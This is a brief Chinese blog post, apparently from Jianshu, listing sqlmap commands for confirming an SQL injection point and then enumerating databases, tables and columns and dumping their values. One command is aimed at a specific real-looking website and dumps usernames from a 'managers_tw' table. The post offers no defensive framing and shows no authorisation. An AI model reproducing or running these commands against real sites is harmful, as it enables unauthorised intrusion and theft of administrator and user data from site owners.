一些神奇的代码

sqlmap.py -u url 验证是否为注入点
sqlmap.py -u url --dbs 列出数据库系统的数据库
sqlmap.py -u url --tables -D db_name 列举数据库表

sqlmap.py -u url --columns -T table_name -D db_name 列举数据库表中的字段

sqlmap.py -u url --dump -C columns_name -T tables_name -D db_name 列举出字段值

./sqlmap.py -u "http://www.calin.com.tw/ab.php?id=1&item_id=3" --dump -C username --columns -T managers_tw -D dbcalin

https://zhuanlan.zhihu.com/p/36336483
https://www.cnblogs.com/anka9080/p/sqlmap.html

image.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容